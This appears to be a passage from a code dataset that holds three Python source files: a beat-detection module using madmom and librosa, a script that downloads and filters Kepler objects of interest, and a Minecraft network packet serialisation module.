MutableSequence\n import madmom\n assert len(audio[0])>sr*2, f'Audio file is too short, len={len(audio[0])} samples, or {len(audio[0])/sr} seconds. Minimum length is 2 seconds, audio below that breaks madmom processors.'\n if lib=='madmom.BeatTrackingProcessor':\n proc = madmom.features.beats.BeatTrackingProcessor(fps=100)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.BeatTrackingProcessor.constant':\n proc = madmom.features.beats.BeatTrackingProcessor(fps=100, look_ahead=None)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.BeatTrackingProcessor.consistent':\n proc = madmom.features.beats.BeatTrackingProcessor(fps=100, look_ahead=None, look_aside=0)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.BeatDetectionProcessor':\n proc = madmom.features.beats.BeatDetectionProcessor(fps=100)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.BeatDetectionProcessor.consistent':\n proc = madmom.features.beats.BeatDetectionProcessor(fps=100, look_aside=0)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.CRFBeatDetectionProcessor':\n proc = madmom.features.beats.CRFBeatDetectionProcessor(fps=100)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.CRFBeatDetectionProcessor.constant':\n proc = madmom.features.beats.CRFBeatDetectionProcessor(fps=100, use_factors=True, factors=[0.5, 1, 2])\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.DBNBeatTrackingProcessor':\n proc = madmom.features.beats.DBNBeatTrackingProcessor(fps=100)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.DBNBeatTrackingProcessor.1000':\n proc = madmom.features.beats.DBNBeatTrackingProcessor(fps=100, transition_lambda=1000)\n act = madmom.features.beats.RNNBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n elif lib=='madmom.DBNDownBeatTrackingProcessor':\n proc = madmom.features.downbeats.DBNDownBeatTrackingProcessor(beats_per_bar=[4], fps=100)\n act = madmom.features.downbeats.RNNDownBeatProcessor()(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n beatmap=beatmap[:,0]\n elif lib=='madmom.PatternTrackingProcessor': #broken\n from madmom.models import PATTERNS_BALLROOM\n proc = madmom.features.downbeats.PatternTrackingProcessor(PATTERNS_BALLROOM, fps=50)\n from madmom.audio.spectrogram import LogarithmicSpectrogramProcessor, SpectrogramDifferenceProcessor, MultiBandSpectrogramProcessor\n from madmom.processors import SequentialProcessor\n log = LogarithmicSpectrogramProcessor()\n diff = SpectrogramDifferenceProcessor(positive_diffs=True)\n mb = MultiBandSpectrogramProcessor(crossover_frequencies=[270])\n pre_proc = SequentialProcessor([log, diff, mb])\n act = pre_proc(madmom.audio.signal.Signal(audio.T, sr))\n beatmap= proc(act)*sr\n beatmap=beatmap[:,0]\n elif lib=='madmom.DBNBarTrackingProcessor': #broken\n beats = generate(audio=audio, sr=sr, filename=filename, lib='madmom.DBNBeatTrackingProcessor', caching = caching)\n proc = madmom.features.downbeats.DBNBarTrackingProcessor(beats_per_bar=[4], fps=100)\n act = madmom.features.downbeats.RNNBarProcessor()(((madmom.audio.signal.Signal(audio.T, sr)), beats))\n beatmap= proc(act)*sr\n elif lib=='librosa': #broken in 3.9, works in 3.8\n import librosa\n beat_frames = librosa.beat.beat_track(y=audio[0], sr=sr, hop_length=512)\n beatmap = librosa.frames_to_samples(beat_frames[1])\n \n # save the beatmap and return\n if caching is True: np.savetxt(cacheDir, beatmap.astype(int), fmt='%d')\n if not isinstance(beatmap, np.ndarray): beatmap=np.asarray(beatmap, dtype=int)\n else: beatmap=beatmap.astype(int)\n\n if load_settings is True:\n settingsDir=\"beat_manipulator/beatmaps/\" + ''.join(filename.split('/')[-1]) + \"_\"+lib+\"_\"+audio_id+'_settings.txt'\n if os.path.exists(settingsDir):\n with open(settingsDir, 'r') as f:\n settings = f.read().split(',')\n if settings[0] != 'None': beatmap = scale(beatmap, settings[0], log = False)\n if settings[1] != 'None': beatmap = shift(beatmap, settings[1], log = False)\n if settings[2] != 'None': beatmap = np.sort(np.absolute(beatmap - int(settings[2])))\n\n return beatmap\n\n\n\ndef save_settings(audio: np.ndarray, filename: str = None, lib: str = 'madmom.BeatDetectionProcessor', scale: float = None, shift: float = None, adjust: int = None, normalized: str = None, log = True, overwrite = 'ask'):\n if isinstance(overwrite, str): overwrite = overwrite.lower()\n audio_id=hex(len(audio[0]))\n cacheDir=\"beat_manipulator/beatmaps/\" + ''.join(filename.split('/')[-1]) + \"_\"+lib+\"_\"+audio_id+'.txt'\n import os\n assert os.path.exists(cacheDir), f\"Beatmap `{cacheDir}` doesn't exist\"\n settingsDir=\"beat_manipulator/beatmaps/\" + ''.join(filename.split('/')[-1]) + \"_\"+lib+\"_\"+audio_id+'_settings.txt'\n\n try: \n a = utils._safer_eval_strict(scale)\n if a == 1: scale = None\n except Exception as e: assert scale is None, f'scale = `{scale}` - Not a valid scale, should be either a number, a math expression, or None: {e}'\n try: \n a = utils._safer_eval_strict(shift)\n if a == 0: shift = None\n except Exception as e: assert shift is None, f'shift = `{shift}` - Not a valid shift: {e}'\n assert isinstance(adjust, int) or adjust is None, f'adjust = `{adjust}` should be int, but it is `{type(adjust)}`'\n \n if adjust == 0: adjust = None\n\n if os.path.exists(settingsDir):\n if overwrite == 'ask' or overwrite =='a': \n what = input(f'`{settingsDir}` already exists. Overwrite (y/n)?: ')\n if not (what.lower() == 'y' or what.lower() == 'yes'): return\n elif not (overwrite == 'true' or overwrite =='y' or overwrite =='yes' or overwrite is True): return\n \n with open(settingsDir, 'w') as f:\n f.write(f'{scale},{shift},{adjust},{normalized}')\n if log is True: print(f\"Saved scale = `{scale}`, shift = `{shift}`, adjust = `{adjust}` to `{settingsDir}`\")\n\n","repo_name":"stunlocked1/beat_manipulator","sub_path":"beat_manipulator/beatmap.py","file_name":"beatmap.py","file_ext":"py","file_size_in_byte":10763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"33494307983","text":"\"\"\"Download the KOIs.\"\"\"\n\nimport numpy as np\nimport kplr\nfrom kplr import KOI\nimport pickle\n\n\ndef GetKOIs():\n \"\"\"Return a list of all KOIs with minor vetting.\"\"\"\n try:\n kois = pickle.load(open(\"kois.pickle\", \"rb\"))\n except (FileNotFoundError, pickle.UnpicklingError):\n\n # A little hack\n KOI._id = '{kepid}'\n client = kplr.API()\n\n # Get all the DR25 KOIs\n columns = ('kepid', 'kepoi_name', 'kepler_name', 'koi_pdisposition',\n 'koi_period', 'koi_period_err1', 'koi_period_err2',\n 'koi_impact', 'koi_impact_err1', 'koi_impact_err2',\n 'koi_duration', 'koi_duration_err1', 'koi_duration_err2',\n 'koi_ror', 'koi_ror_err1', 'koi_ror_err2',\n 'koi_srho', 'koi_srho_err1', 'koi_srho_err2',\n 'koi_score')\n params = {\"select\": \",\".join(columns)}\n kois = [kplr.KOI(client, k) for k in\n client.ea_request(\"q1_q17_dr25_koi\", **params)]\n\n # Get all the stars, and add their properties to\n # the KOIs\n columns = ('kepid', 'radius', 'radius_err1', 'radius_err2',\n 'mass', 'mass_err1', 'mass_err2',\n 'teff_prov')\n params = {\"select\": \",\".join(columns)}\n all_stars = client.ea_request(\"q1_q17_dr25_stellar\", **params)\n kepids = np.array([s['kepid'] for s in all_stars])\n for i, koi in enumerate(kois):\n koi.kepid\n ind = np.argmax(kepids == koi.kepid)\n for k, v in all_stars[ind].items():\n setattr(kois[i], 'star_' + k, v)\n\n # Apply some filters.\n good = []\n for i, koi in enumerate(kois):\n\n # False positive\n if koi.koi_pdisposition == 'FALSE POSITIVE':\n continue\n\n # No stellar data for this KOI\n elif koi.star_teff_prov == 'Solar':\n continue\n\n # Some important value is None\n elif koi.koi_impact is None:\n continue\n\n # Low score\n elif koi.koi_score < 0.9:\n continue\n\n # Bad impact parameter\n elif koi.koi_impact >= 1:\n continue\n\n # This target is OK\n else:\n good.append(i)\n\n # Make the cut\n print(\"Using %d of %d available KOIs.\" % (len(good), len(kois)))\n kois = [kois[i] for i in good]\n\n pickle.dump(kois, open(\"kois.pickle\", \"wb\"))\n\n return kois\n","repo_name":"rodluger/exoq","sub_path":"py/kois.py","file_name":"kois.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5722462688","text":"#!/usr/bin/env python3\n\nfrom __future__ import annotations\n\nfrom collections.abc import (\n Iterator as _Iterator,\n)\n\nimport json as _json\nimport math as _math\n\nfrom itertools import islice as _islice\n\nfrom uuid import UUID as _UUID\n\nfrom ..packet import MinecraftPacketWithID as _MinecraftPacketWithID\n\nfrom ...utils import byte as _byte\nfrom ...utils import iter as _iter\n\n\nclass Packet(_MinecraftPacketWithID):\n\n pass\n\n\nclass SpawnLivingEntity(Packet):\n\n id = 0x2\n\n def __init__(\n self,\n entity_id: int,\n entity_uuid: _UUID | str,\n entity_type: int,\n x: float,\n y: float,\n z: float,\n yaw: float,\n pitch: float,\n head_pitch: float,\n velocity_x: float,\n velocity_y: float,\n velocity_z: float,\n ) -> None:\n\n if entity_uuid and not isinstance(entity_uuid, _UUID):\n entity_uuid = _UUID(entity_uuid)\n\n super().__init__()\n\n self.entity_id = entity_id\n self.entity_uuid = entity_uuid\n self.entity_type = entity_type\n self.x = x\n self.y = y\n self.z = z\n self.yaw = yaw\n self.pitch = pitch\n self.head_pitch = head_pitch\n self.velocity_x = velocity_x\n self.velocity_y = velocity_y\n self.velocity_z = velocity_z\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'entity_uuid',\n 'entity_type',\n 'x',\n 'y',\n 'z',\n 'yaw',\n 'pitch',\n 'head_pitch',\n 'velocity_x',\n 'velocity_y',\n 'velocity_z',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%b%b%b%b%c%c%c%b%b%b' % (\n _byte.render_varint(self.entity_id),\n self.entity_uuid.bytes,\n _byte.render_varint(self.entity_type),\n _byte.render_double(self.x),\n _byte.render_double(self.y),\n _byte.render_double(self.z),\n round(self.yaw / 1.40625) & 0xff,\n round(self.pitch / 1.40625) & 0xff,\n round(self.head_pitch / 1.40625) & 0xff,\n round(self.velocity_x * 8000).to_bytes(2, 'big', signed=True),\n round(self.velocity_y * 8000).to_bytes(2, 'big', signed=True),\n round(self.velocity_z * 8000).to_bytes(2, 'big', signed=True),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n self.entity_uuid = _UUID(bytes=bytes(_islice(it, 16)))\n self.entity_type = _iter.consume_varint(it)\n self.x = _iter.consume_double(it)\n self.y = _iter.consume_double(it)\n self.z = _iter.consume_double(it)\n self.yaw = next(it) * 1.40625\n self.pitch = next(it) * 1.40625\n self.head_pitch = next(it) * 1.40625\n self.velocity_x = int.from_bytes(_islice(it, 2), 'big', signed=True) / 8000\n self.velocity_y = int.from_bytes(_islice(it, 2), 'big', signed=True) / 8000\n self.velocity_z = int.from_bytes(_islice(it, 2), 'big', signed=True) / 8000\n () = it\n\n assert 0 <= self.entity_type <= 112\n assert _math.isfinite(self.x)\n assert _math.isfinite(self.y)\n assert _math.isfinite(self.z)\n\n\nclass ServerDifficulty(Packet):\n\n id = 0xe\n\n def __init__(self, difficulty: int = 2, locked: bool = True) -> None:\n\n super().__init__()\n\n self.difficulty = difficulty\n self.locked = locked\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'difficulty',\n 'locked',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%c%c' % (\n self.difficulty,\n self.locked,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.difficulty = next(it)\n self.locked = bool(next(it))\n () = it\n\n assert 0 <= self.difficulty <= 3\n\n\nclass ChatMessage(Packet):\n\n id = 0xf\n\n def __init__(\n self,\n data: dict = None,\n position: int = 0,\n sender: _UUID = None,\n ) -> None:\n\n if sender and not isinstance(sender, _UUID):\n sender = _UUID(sender)\n\n super().__init__()\n\n self.data = data\n self.position = position\n self.sender = sender\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'data',\n 'position',\n 'sender',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%c%b' % (\n _byte.render_varstr(_json.dumps(self.data, separators=(',', ':'))),\n self.position,\n self.sender.bytes,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.data = _json.loads(_iter.consume_varstr(it))\n self.position = next(it)\n self.sender = _UUID(bytes=bytes(_islice(it, 16)))\n () = it\n\n assert 0 <= self.position <= 2\n\n\n# TODO: complete\nclass DeclareCommands(Packet):\n\n id = 0x12\n\n def __init__(self, raw_tail: bytes) -> None:\n\n super().__init__()\n\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b' % (\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass WindowItems(Packet):\n\n id = 0x14\n\n def __init__(self, window_id: int, state_id: int, raw_tail: bytes) -> None:\n\n super().__init__()\n\n self.window_id = window_id\n self.state_id = state_id\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'window_id',\n 'state_id',\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%c%b%b' % (\n self.window_id,\n _byte.render_varint(self.state_id),\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.window_id = next(it)\n self.state_id = _iter.consume_varint(it)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\nclass PluginMessage(Packet):\n\n id = 0x18\n\n def __init__(\n self,\n namespace: str = 'minecraft',\n channel: str = None,\n data: bytes | bytearray = None,\n ) -> None:\n\n super().__init__()\n\n self.namespace = namespace\n self.channel = channel\n self.data = data\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'namespace',\n 'channel',\n 'data',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_identifier(self.namespace, self.channel),\n self.data,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.namespace, self.channel = _iter.consume_identifier(it)\n self.data = bytes(it)\n\n\nclass EntityTrigger(Packet):\n\n id = 0x1b\n\n def __init__(self, entity_id: int, trigger: int) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.trigger = trigger\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'trigger',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%c' % (\n self.entity_id.to_bytes(4, 'big'),\n self.trigger,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = int.from_bytes(_islice(it, 4), 'big')\n self.trigger = next(it)\n () = it\n\n assert 0 <= self.trigger <= 60\n\n\nclass InitializeWorldBorder(Packet):\n\n id = 0x20\n\n def __init__(\n self,\n x: float,\n z: float,\n old_diameter: float,\n new_diameter: float,\n speed: float,\n portal_teleport_boundary: int,\n warning_blocks: int,\n warning_time: int,\n ) -> None:\n\n super().__init__()\n\n self.x = x\n self.z = z\n self.old_diameter = old_diameter\n self.new_diameter = new_diameter\n self.speed = speed\n self.portal_teleport_boundary = portal_teleport_boundary\n self.warning_blocks = warning_blocks\n self.warning_time = warning_time\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'x',\n 'z',\n 'old_diameter',\n 'new_diameter',\n 'speed',\n 'portal_teleport_boundary',\n 'warning_blocks',\n 'warning_time',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%b%b%b%b%b%b' % (\n _byte.render_double(self.x),\n _byte.render_double(self.z),\n _byte.render_double(self.old_diameter),\n _byte.render_double(self.new_diameter),\n _byte.render_varlong(round(self.speed * 1000)),\n _byte.render_varint(self.portal_teleport_boundary),\n _byte.render_varint(self.warning_blocks),\n _byte.render_varint(self.warning_time),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.x = _iter.consume_double(it)\n self.z = _iter.consume_double(it)\n self.old_diameter = _iter.consume_double(it)\n self.new_diameter = _iter.consume_double(it)\n self.speed = _iter.consume_varlong(it) / 1000\n self.portal_teleport_boundary = _iter.consume_varint(it)\n self.warning_blocks = _iter.consume_varint(it)\n self.warning_time = _iter.consume_varint(it)\n () = it\n\n assert _math.isfinite(self.x)\n assert _math.isfinite(self.z)\n assert _math.isfinite(self.old_diameter) and self.old_diameter > 0\n assert _math.isfinite(self.new_diameter) and self.new_diameter > 0\n\n\n# TODO: complete\nclass ChunkData(Packet):\n\n id = 0x22\n\n def __init__(\n self,\n chunk_x: int,\n chunk_z: int,\n # ...,\n raw_tail: bytes,\n ) -> None:\n\n super().__init__()\n\n self.chunk_x = chunk_x\n self.chunk_z = chunk_z\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'chunk_x',\n 'chunk_z',\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%b' % (\n self.chunk_x.to_bytes(4, 'big', signed=True),\n self.chunk_z.to_bytes(4, 'big', signed=True),\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.chunk_x = int.from_bytes(_islice(it, 4), 'big', signed=True)\n self.chunk_z = int.from_bytes(_islice(it, 4), 'big', signed=True)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass UpdateLight(Packet):\n\n id = 0x25\n\n def __init__(\n self,\n chunk_x: int,\n chunk_z: int,\n trust_edges: bool,\n # ...,\n raw_tail: bytes,\n ) -> None:\n\n super().__init__()\n\n self.chunk_x = chunk_x\n self.chunk_z = chunk_z\n self.trust_edges = trust_edges\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'chunk_x',\n 'chunk_z',\n 'trust_edges',\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%c%b' % (\n _byte.render_varint(self.chunk_x),\n _byte.render_varint(self.chunk_z),\n self.trust_edges,\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.chunk_x = _iter.consume_varint(it)\n self.chunk_z = _iter.consume_varint(it)\n self.trust_edges = bool(next(it))\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass JoinGame(Packet):\n\n id = 0x26\n\n def __init__(\n self,\n entity_id: int,\n hardcore: bool,\n gamemode: int,\n previous_gamemode: int,\n # dimension: int,\n # hashed_seed: int,\n # max_players: int = 20,\n # level_type: str = 'default',\n # view_distance: int = 10,\n # reduced_debug_info: bool = False,\n # enable_respawn_screen: bool = True,\n raw_tail: bytes,\n ) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.hardcore = hardcore\n self.gamemode = gamemode\n self.previous_gamemode = previous_gamemode\n # self.dimension = dimension\n # self.hashed_seed = hashed_seed\n # self.max_players = max_players\n # self.level_type = level_type\n # self.view_distance = view_distance\n # self.reduced_debug_info = reduced_debug_info\n # self.enable_respawn_screen = enable_respawn_screen\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'hardcore',\n 'gamemode',\n 'previous_gamemode',\n # 'dimension',\n # 'hashed_seed',\n # 'max_players',\n # 'level_type',\n # 'view_distance',\n # 'reduced_debug_info',\n # 'enable_respawn_screen',\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%c%c%c%b' % (\n self.entity_id.to_bytes(4, 'big', signed=True),\n self.hardcore,\n self.gamemode,\n self.previous_gamemode & 0xff,\n # self.dimension.to_bytes(4, 'big', signed=True),\n # self.hashed_seed.to_bytes(8, 'big', signed=True),\n # self.max_players,\n # _byte.render_varstr(self.level_type),\n # _byte.render_varint(self.view_distance),\n # self.reduced_debug_info,\n # self.enable_respawn_screen,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = int.from_bytes(_islice(it, 4), 'big', signed=True)\n self.hardcore = bool(next(it))\n self.gamemode = next(it)\n self.previous_gamemode = (next(it) ^ 0x80) - 0x80\n # self.dimension = int.from_bytes(_islice(it, 4), 'big', signed=True)\n # self.hashed_seed = int.from_bytes(_islice(it, 8), 'big', signed=True)\n # self.max_players = next(it)\n # self.level_type = _iter.consume_varstr(it)\n # self.view_distance = _iter.consume_varint(it)\n # self.reduced_debug_info = bool(next(it))\n # self.enable_respawn_screen = bool(next(it))\n self.raw_tail = bytes(it)\n # () = it\n\n assert self.entity_id != 0\n assert 0 <= self.gamemode <= 3\n assert -1 <= self.previous_gamemode <= 3\n # assert -1 <= self.dimension <= 1\n # assert self.max_players > 0\n # assert self.level_type in [\n # 'default',\n # 'flat',\n # 'largeBiomes',\n # 'amplified',\n # 'customized',\n # 'buffet',\n # 'default_1_1',\n # ]\n # assert 2 <= self.view_distance <= 32\n\n\nclass PlayerAbilities(Packet):\n\n id = 0x32\n\n def __init__(\n self,\n flags: int = 0,\n flying_speed: float = 0.05,\n fov_modifier: float = 0.1,\n ) -> None:\n\n super().__init__()\n\n self.flags = flags\n self.flying_speed = flying_speed\n self.fov_modifier = fov_modifier\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'flags',\n 'flying_speed',\n 'fov_modifier',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%c%b%b' % (\n self.flags,\n _byte.render_float(self.flying_speed),\n _byte.render_float(self.fov_modifier),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.flags = next(it)\n self.flying_speed = _iter.consume_float(it)\n self.fov_modifier = _iter.consume_float(it)\n () = it\n\n assert not (self.flags & ~0xf)\n assert _math.isfinite(self.flying_speed) and self.flying_speed >= 0\n assert _math.isfinite(self.fov_modifier) and self.fov_modifier >= 0\n\n\nclass PlayerInfo(Packet):\n\n id = 0x36\n\n def __init__(\n self,\n action: int = 0,\n updates: dict[_UUID, dict[str, int | str | dict] | None] = None,\n ) -> None:\n\n super().__init__()\n\n self.action = action\n self.updates = updates\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'action',\n 'updates',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n payload = _byte.render_varint(self.action)\n\n payload += _byte.render_varint(len(self.updates))\n for uuid, update in self.updates.items():\n payload += uuid.bytes\n\n if self.action == 0:\n payload += _byte.render_varstr(update['name'])\n\n properties = update['properties']\n payload += _byte.render_varint(len(properties))\n for name, (value, signature) in properties.items():\n payload += _byte.render_varstr(name)\n payload += _byte.render_varstr(value)\n payload += (b'\\x00' if signature is None else\n b'\\x01' + _byte.render_varstr(signature))\n\n if self.action in (0, 1):\n payload += _byte.render_varint(update['gamemode'])\n\n if self.action in (0, 2):\n payload += _byte.render_varint(update['ping'])\n\n if self.action in (0, 3):\n display_name = update['display_name']\n payload += (b'\\x00' if display_name is None else\n b'\\x01' + _byte.render_varstr(display_name))\n\n return payload\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.action = _iter.consume_varint(it)\n assert 0 <= self.action <= 4\n\n self.updates = {}\n for _ in range(_iter.consume_varint(it)):\n uuid = _UUID(bytes=bytes(_islice(it, 16)))\n if self.action == 4:\n self.updates[uuid] = None\n continue\n\n update = self.updates[uuid] = {}\n\n if self.action == 0:\n update['name'] = _iter.consume_varstr(it)\n properties = update['properties'] = {}\n for __ in range(_iter.consume_varint(it)):\n name = _iter.consume_varstr(it)\n value = _iter.consume_varstr(it)\n signature = _iter.consume_varstr(it) if next(it) else None\n properties[name] = (value, signature)\n update['properties'] = properties\n\n if self.action in (0, 1):\n update['gamemode'] = _iter.consume_varint(it)\n\n if self.action in (0, 2):\n update['ping'] = _iter.consume_varint(it)\n\n if self.action in (0, 3):\n update['display_name'] = (_iter.consume_varstr(it)\n if next(it) else None)\n () = it\n\n\nclass PlayerPositionAndLook(Packet):\n\n id = 0x38\n\n def __init__(\n self,\n x: float = 0.0,\n y: float = 0.0,\n z: float = 0.0,\n yaw: float = 0.0,\n pitch: float = 0.0,\n flags: int = 0,\n teleport_id: int = 0,\n dismount_vehicle: bool = False,\n ) -> None:\n\n super().__init__()\n\n self.x = x\n self.y = y\n self.z = z\n self.yaw = yaw\n self.pitch = pitch\n self.flags = flags\n self.teleport_id = teleport_id\n self.dismount_vehicle = dismount_vehicle\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'x',\n 'y',\n 'z',\n 'yaw',\n 'pitch',\n 'flags',\n 'teleport_id',\n 'dismount_vehicle',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b%b%b%b%c%b%c' % (\n _byte.render_double(self.x),\n _byte.render_double(self.y),\n _byte.render_double(self.z),\n _byte.render_float(self.yaw),\n _byte.render_float(self.pitch),\n self.flags,\n _byte.render_varint(self.teleport_id),\n self.dismount_vehicle,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.x = _iter.consume_double(it)\n self.y = _iter.consume_double(it)\n self.z = _iter.consume_double(it)\n self.yaw = _iter.consume_float(it)\n self.pitch = _iter.consume_float(it)\n self.flags = next(it)\n self.teleport_id = _iter.consume_varint(it)\n self.dismount_vehicle = bool(next(it))\n () = it\n\n assert _math.isfinite(self.x)\n assert _math.isfinite(self.y)\n assert _math.isfinite(self.z)\n assert _math.isfinite(self.yaw)\n assert _math.isfinite(self.pitch)\n assert not (self.flags & ~0x1f)\n\n\nclass EntityHeadLook(Packet):\n\n id = 0x3e\n\n def __init__(self, entity_id: int, head_yaw: float) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.head_yaw = head_yaw\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'head_yaw',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%c' % (\n _byte.render_varint(self.entity_id),\n round(self.head_yaw / 1.40625) & 0xff,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n self.head_yaw = next(it) * 1.40625\n () = it\n\n\nclass HeldItemChange(Packet):\n\n id = 0x48\n\n def __init__(self, slot: int = 0) -> None:\n\n super().__init__()\n\n self.slot = slot\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'slot',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%c' % (\n self.slot,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.slot = next(it)\n () = it\n\n assert 0 <= self.slot <= 8\n\n\nclass UpdateViewPosition(Packet):\n\n id = 0x49\n\n def __init__(self, chunk_x: int, chunk_z: int) -> None:\n\n super().__init__()\n\n self.chunk_x = chunk_x\n self.chunk_z = chunk_z\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'chunk_x',\n 'chunk_z',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_varint(self.chunk_x),\n _byte.render_varint(self.chunk_z),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.chunk_x = _iter.consume_varint(it)\n self.chunk_z = _iter.consume_varint(it)\n () = it\n\n\nclass SpawnPosition(Packet):\n\n id = 0x4b\n\n def __init__(self, x: int, y: int, z: int, angle: float) -> None:\n\n super().__init__()\n\n 